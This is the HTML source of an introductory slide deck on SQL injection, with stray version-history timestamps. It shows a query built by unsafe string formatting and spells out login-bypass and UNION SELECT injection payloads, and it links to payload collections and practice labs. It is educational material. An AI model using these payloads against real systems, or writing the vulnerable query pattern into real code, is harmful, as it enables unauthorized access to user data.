2024-04-11 15:41:37 +02:00
<!DOCTYPE html>
< html >
< head >
< meta charset = "utf-8" >
< meta name = "generator" content = "pandoc" >
< meta name = "author" content = "Stefan Friese" >
< title > Introduction to SQL Injection< / title >
< meta name = "apple-mobile-web-app-capable" content = "yes" >
< meta name = "apple-mobile-web-app-status-bar-style" content = "black-translucent" >
< meta name = "viewport" content = "width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui" >
< link rel = "stylesheet" href = "https://unpkg.com/reveal.js@^4//dist/reset.css" >
< link rel = "stylesheet" href = "https://unpkg.com/reveal.js@^4//dist/reveal.css" >
< style >
.reveal .sourceCode { /* see #7635 */
overflow: visible;
}
code{white-space: pre-wrap;}
span.smallcaps{font-variant: small-caps;}
div.columns{display: flex; gap: min(4vw, 1.5em);}
div.column{flex: auto; overflow-x: auto;}
div.hanging-indent{margin-left: 1.5em; text-indent: -1.5em;}
/* The extra [class] is a hack that increases specificity enough to
override a similar rule in reveal.js */
ul.task-list[class]{list-style: none;}
ul.task-list li input[type="checkbox"] {
font-size: inherit;
width: 0.8em;
margin: 0 0.8em 0.2em -1.6em;
vertical-align: middle;
}
/* CSS for syntax highlighting */
pre > code.sourceCode { white-space: pre; position: relative; }
pre > code.sourceCode > span { line-height: 1.25; }
pre > code.sourceCode > span:empty { height: 1.2em; }
.sourceCode { overflow: visible; }
code.sourceCode > span { color: inherit; text-decoration: inherit; }
div.sourceCode { margin: 1em 0; }
pre.sourceCode { margin: 0; }
@media screen {
div.sourceCode { overflow: auto; }
}
@media print {
pre > code.sourceCode { white-space: pre-wrap; }
pre > code.sourceCode > span { display: inline-block; text-indent: -5em; padding-left: 5em; }
}
pre.numberSource code
{ counter-reset: source-line 0; }
pre.numberSource code > span
{ position: relative; left: -4em; counter-increment: source-line; }
pre.numberSource code > span > a:first-child::before
{ content: counter(source-line);
position: relative; left: -1em; text-align: right; vertical-align: baseline;
border: none; display: inline-block;
-webkit-touch-callout: none; -webkit-user-select: none;
-khtml-user-select: none; -moz-user-select: none;
-ms-user-select: none; user-select: none;
padding: 0 4px; width: 4em;
color: #aaaaaa;
}
pre.numberSource { margin-left: 3em; border-left: 1px solid #aaaaaa; padding-left: 4px; }
div.sourceCode
{ }
@media screen {
pre > code.sourceCode > span > a:first-child::before { text-decoration: underline; }
}
code span.al { color: #ff0000; font-weight: bold; } /* Alert */
code span.an { color: #60a0b0; font-weight: bold; font-style: italic; } /* Annotation */
code span.at { color: #7d9029; } /* Attribute */
code span.bn { color: #40a070; } /* BaseN */
code span.bu { color: #008000; } /* BuiltIn */
code span.cf { color: #007020; font-weight: bold; } /* ControlFlow */
code span.ch { color: #4070a0; } /* Char */
code span.cn { color: #880000; } /* Constant */
code span.co { color: #60a0b0; font-style: italic; } /* Comment */
code span.cv { color: #60a0b0; font-weight: bold; font-style: italic; } /* CommentVar */
code span.do { color: #ba2121; font-style: italic; } /* Documentation */
code span.dt { color: #902000; } /* DataType */
code span.dv { color: #40a070; } /* DecVal */
code span.er { color: #ff0000; font-weight: bold; } /* Error */
code span.ex { } /* Extension */
code span.fl { color: #40a070; } /* Float */
code span.fu { color: #06287e; } /* Function */
code span.im { color: #008000; font-weight: bold; } /* Import */
code span.in { color: #60a0b0; font-weight: bold; font-style: italic; } /* Information */
code span.kw { color: #007020; font-weight: bold; } /* Keyword */
code span.op { color: #666666; } /* Operator */
code span.ot { color: #007020; } /* Other */
code span.pp { color: #bc7a00; } /* Preprocessor */
code span.sc { color: #4070a0; } /* SpecialChar */
code span.ss { color: #bb6688; } /* SpecialString */
code span.st { color: #4070a0; } /* String */
code span.va { color: #19177c; } /* Variable */
code span.vs { color: #4070a0; } /* VerbatimString */
code span.wa { color: #60a0b0; font-weight: bold; font-style: italic; } /* Warning */
< / style >
2024-04-18 15:56:25 +02:00
< link rel = "stylesheet" href = "https://unpkg.com/reveal.js@^4//dist/theme/simple.css" id = "theme" >
< link rel = "stylesheet" href = "./robot-lung.css" / >
2024-04-11 15:41:37 +02:00
< / head >
< body >
2024-04-18 15:56:25 +02:00
< div class = "line top" > < / div >
< div class = "line bottom" > < / div >
< div class = "line left" > < / div >
< div class = "line right" > < / div >
2024-04-11 15:41:37 +02:00
< div class = "reveal" >
< div class = "slides" >
< section id = "title-slide" >
< h1 class = "title" > Introduction to SQL Injection< / h1 >
< p class = "author" > Stefan Friese< / p >
< p class = "date" > 11 April, 2024< / p >
< / section >
< section id = "topics" class = "slide level1" >
< h1 > Topics< / h1 >
< ul >
< li class = "fragment" > How an SQL Injection is Created< / li >
< li class = "fragment" > How to Exploit an SQL Injection< / li >
< li class = "fragment" > SPOILER: How to Prevent an SQL Injection in the
Next Presentation< / li >
< / ul >
< / section >
< section class = "slide level1" >
< h2 id = "how-does-it-happen" > How Does it Happen< / h2 >
< p > An SQL injection occurs when two things come together.< / p >
< / section >
< section class = "slide level1" >
< h3 id = "number-1" > Number 1< / h3 >
2024-04-18 15:56:25 +02:00
< p > An SQL Query as a string embedded in other languages.< / p >
2024-04-11 15:41:37 +02:00
< div class = "sourceCode" id = "cb1" > < pre
2024-04-18 15:56:25 +02:00
class="sourceCode sql">< code class = "sourceCode sql" > < span id = "cb1-1" > < a href = "#cb1-1" aria-hidden = "true" tabindex = "-1" > < / a > sql_query < span class = "op" > =< / span > < / span >
< span id = "cb1-2" > < a href = "#cb1-2" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "kw" > cursor< / span > .< span class = "kw" > execute< / span > (< / span >
< span id = "cb1-3" > < a href = "#cb1-3" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "ot" > " SELECT * FROM users WHERE username = ' admin' \< / span > < / span >
< span id = "cb1-4" > < a href = "#cb1-4" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "kw" > AND< / span > < span class = "kw" > password< / span > < span class = "op" > =< / span > < span class = "st" > ' s3cur3P4ssw0rd' < / span > < span class = "ot" > " < / span > < / span >
2024-04-16 15:11:51 +02:00
< span id = "cb1-5" > < a href = "#cb1-5" aria-hidden = "true" tabindex = "-1" > < / a > )< / span > < / code > < / pre > < / div >
2024-04-11 15:41:37 +02:00
< / section >
< section class = "slide level1" >
< h3 id = "number-2" > Number 2< / h3 >
2024-04-18 15:56:25 +02:00
< p > User input is possible inside a value of type string as a part of
said SQL query.< / p >
2024-04-11 15:41:37 +02:00
< div class = "sourceCode" id = "cb2" > < pre
2024-04-18 15:56:25 +02:00
class="sourceCode sql">< code class = "sourceCode sql" > < span id = "cb2-1" > < a href = "#cb2-1" aria-hidden = "true" tabindex = "-1" > < / a > sql_query < span class = "op" > =< / span > < / span >
< span id = "cb2-2" > < a href = "#cb2-2" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "kw" > cursor< / span > .< span class = "kw" > execute< / span > (< / span >
< span id = "cb2-3" > < a href = "#cb2-3" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "ot" > " SELECT * FROM users WHERE username = ' %s' AND password = ' %s' " < / span > \< / span >
< span id = "cb2-4" > < a href = "#cb2-4" aria-hidden = "true" tabindex = "-1" > < / a > % (username, < span class = "kw" > password< / span > )< / span >
2024-04-12 16:21:09 +02:00
< span id = "cb2-5" > < a href = "#cb2-5" aria-hidden = "true" tabindex = "-1" > < / a > )< / span > < / code > < / pre > < / div >
2024-04-11 15:41:37 +02:00
< / section >
< section class = "slide level1" >
2024-04-18 15:56:25 +02:00
< h2 id = "how-to-exploit-an-sqli-vulnerability" > How to Exploit an SQLi
Vulnerability< / h2 >
2024-04-11 15:41:37 +02:00
< ul >
2024-04-12 16:21:09 +02:00
< li class = "fragment" > Close the string through an ending quote< / li >
< li class = "fragment" > Continue the query with your own SQL code< / li >
2024-04-11 15:41:37 +02:00
< / ul >
< / section >
2024-04-16 15:11:51 +02:00
< section class = "slide level1" >
< h3 id = "crafting-an-sql-query" > Crafting an SQL Query< / h3 >
< blockquote >
< div class = "sourceCode" id = "cb3" > < pre
class="sourceCode sql">< code class = "sourceCode sql" > < span id = "cb3-1" > < a href = "#cb3-1" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "st" > ' or ' < / span > < span class = "dv" > 1< / span > < span class = "st" > ' =' < / span > < span class = "dv" > 1< / span > < span class = "st" > ' -- -< / span > < / span > < / code > < / pre > < / div >
< / blockquote >
< ul >
< li class = "fragment" > Close the existing string with: < code > '< / code > < / li >
< li class = "fragment" > Write a query that equals to True:
< code > 1=1< / code > < / li >
< li class = "fragment" > End the SQL query through a comment:
< code > -- -< / code > < / li >
< / ul >
< / section >
< section class = "slide level1" >
< h3 id = "what-does-the-query-look-like" > What Does the Query Look
Like< / h3 >
< div class = "sourceCode" id = "cb4" > < pre
class="sourceCode sql">< code class = "sourceCode sql" > < span id = "cb4-1" > < a href = "#cb4-1" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "kw" > SELECT< / span > < span class = "op" > *< / span > < span class = "kw" > FROM< / span > users < span class = "kw" > WHERE< / span > username < span class = "op" > =< / span > < span class = "st" > ' ' < / span > < span class = "kw" > or< / span > < span class = "st" > ' 1' < / span > < span class = "op" > =< / span > < span class = "st" > ' 1' < / span > < span class = "co" > -- - AND password ' %s' < / span > < / span > < / code > < / pre > < / div >
< p > < em > Numbers as strings is an SQLite specific thing< / em > < / p >
< / section >
< section class = "slide level1" >
< h3 id = "other-queries" > Other Queries< / h3 >
< div class = "sourceCode" id = "cb5" > < pre
2024-04-18 15:56:25 +02:00
class="sourceCode sql">< code class = "sourceCode sql" > < span id = "cb5-1" > < a href = "#cb5-1" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "st" > ' UNION SELECT ' < / span > a< span class = "st" > ' ,NULL,NULL,NULL -- -< / span > < / span > < / code > < / pre > < / div >
< div class = "sourceCode" id = "cb6" > < pre
class="sourceCode sql">< code class = "sourceCode sql" > < span id = "cb6-1" > < a href = "#cb6-1" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "st" > ' UNION SELECT * FROM users WHERE user_id = 1 -- -< / span > < / span > < / code > < / pre > < / div >
< div class = "sourceCode" id = "cb7" > < pre
class="sourceCode sql">< code class = "sourceCode sql" > < span id = "cb7-1" > < a href = "#cb7-1" aria-hidden = "true" tabindex = "-1" > < / a > < span class = "st" > ' UNION SELECT * FROM users WHERE user_id != 1337 -- -< / span > < / span > < / code > < / pre > < / div >
2024-04-16 15:11:51 +02:00
< / section >
< section class = "slide level1" >
< h2 id = "even-more-injection-queries" > Even More Injection Queries< / h2 >
< ul >
< li class = "fragment" > < a
href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection">PayloadsAllTheThings< / a > < / li >
< li class = "fragment" > < a
href="https://book.hacktricks.xyz/pentesting-web/sql-injection">Hacktricks
SQL Injection Page< / a > < / li >
< li class = "fragment" > < a
href="https://github.com/sqlmapproject/sqlmap">SQLMap< / a > < / li >
< / ul >
< / section >
< section class = "slide level1" >
< h2 id = "try-for-yourself" > Try for Yourself< / h2 >
2024-04-18 15:56:25 +02:00
< ul >
< li class = "fragment" > < p > Use the provided < a href = "./example" > example< / a >
inside this presentation’ s repository. There is a < a
2024-04-16 15:11:51 +02:00
href="./example/README.md">readme< / a > which guides you through the
2024-04-18 15:56:25 +02:00
setup.< / p > < / li >
< li class = "fragment" > < p > Further, try < a
href="https://github.com/digininja/DVWA">Damn Vulnerable Web
Application< / a > which you can setup by yourself or use < a
href="https://tryhackme.com/r/room/dvwa">Tryhackme’ s DVWA
Room< / a > .< / p > < / li >
< / ul >
2024-04-16 15:11:51 +02:00
< / section >
2024-04-11 15:41:37 +02:00
< section id = "the-end" class = "slide level1" >
< h1 > The End< / h1 >
2024-04-12 16:21:09 +02:00
< p > < img src = "./images/exploits_of_a_mom.png" alt = "Convoluted Code" width = "50%" height = "auto%" > < / p >
2024-04-11 15:41:37 +02:00
< / section >
< / div >
< / div >
< script src = "https://unpkg.com/reveal.js@^4//dist/reveal.js" > < / script >
<!-- reveal.js plugins -->
< script src = "https://unpkg.com/reveal.js@^4//plugin/notes/notes.js" > < / script >
< script src = "https://unpkg.com/reveal.js@^4//plugin/search/search.js" > < / script >
< script src = "https://unpkg.com/reveal.js@^4//plugin/zoom/zoom.js" > < / script >
< script >
// Full list of configuration options available at:
// https://revealjs.com/config/
Reveal.initialize({
// Display controls in the bottom right corner
controls: true,
// Help the user learn the controls by providing hints, for example by
// bouncing the down arrow when they first encounter a vertical slide
controlsTutorial: true,
// Determines where controls appear, "edges" or "bottom-right"
controlsLayout: 'bottom-right',
// Visibility rule for backwards navigation arrows; "faded", "hidden"
// or "visible"
controlsBackArrows: 'faded',
// Display a presentation progress bar
progress: true,
// Display the page number of the current slide
slideNumber: false,
// 'all', 'print', or 'speaker'
showSlideNumber: 'all',
// Add the current slide number to the URL hash so that reloading the
// page/copying the URL will return you to the same slide
hash: true,
// Start with 1 for the hash rather than 0
hashOneBasedIndex: false,
// Flags if we should monitor the hash and change slides accordingly
respondToHashChanges: true,
// Push each slide change to the browser history
history: false,
// Enable keyboard shortcuts for navigation
keyboard: true,
// Enable the slide overview mode
overview: true,
// Disables the default reveal.js slide layout (scaling and centering)
// so that you can use custom CSS layout
disableLayout: false,
// Vertical centering of slides
center: true,
// Enables touch navigation on devices with touch input
touch: true,
// Loop the presentation
loop: false,
// Change the presentation direction to be RTL
rtl: false,
// see https://revealjs.com/vertical-slides/#navigation-mode
navigationMode: 'default',
// Randomizes the order of slides each time the presentation loads
shuffle: false,
// Turns fragments on and off globally
fragments: true,
// Flags whether to include the current fragment in the URL,
// so that reloading brings you to the same fragment position
fragmentInURL: true,
// Flags if the presentation is running in an embedded mode,
// i.e. contained within a limited portion of the screen
embedded: false,
// Flags if we should show a help overlay when the questionmark
// key is pressed
help: true,
// Flags if it should be possible to pause the presentation (blackout)
pause: true,
// Flags if speaker notes should be visible to all viewers
showNotes: false,
// Global override for autoplaying embedded media (null/true/false)
autoPlayMedia: null,
// Global override for preloading lazy-loaded iframes (null/true/false)
preloadIframes: null,
// Number of milliseconds between automatically proceeding to the
// next slide, disabled when set to 0, this value can be overwritten
// by using a data-autoslide attribute on your slides
autoSlide: 0,
// Stop auto-sliding after user input
autoSlideStoppable: true,
// Use this method for navigation when auto-sliding
autoSlideMethod: null,
// Specify the average time in seconds that you think you will spend
// presenting each slide. This is used to show a pacing timer in the
// speaker view
defaultTiming: null,
// Enable slide navigation via mouse wheel
mouseWheel: false,
// The display mode that will be used to show slides
display: 'block',
// Hide cursor if inactive
hideInactiveCursor: true,
// Time before the cursor is hidden (in ms)
hideCursorTime: 5000,
// Opens links in an iframe preview overlay
previewLinks: false,
// Transition style (none/fade/slide/convex/concave/zoom)
transition: 'slide',
// Transition speed (default/fast/slow)
transitionSpeed: 'default',
// Transition style for full page slide backgrounds
// (none/fade/slide/convex/concave/zoom)
backgroundTransition: 'fade',
// Number of slides away from the current that are visible
viewDistance: 3,
// Number of slides away from the current that are visible on mobile
// devices. It is advisable to set this to a lower number than
// viewDistance in order to save resources.
mobileViewDistance: 2,
// reveal.js plugins
plugins: [
RevealNotes,
RevealSearch,
RevealZoom
]
});
< / script >
< / body >
< / html >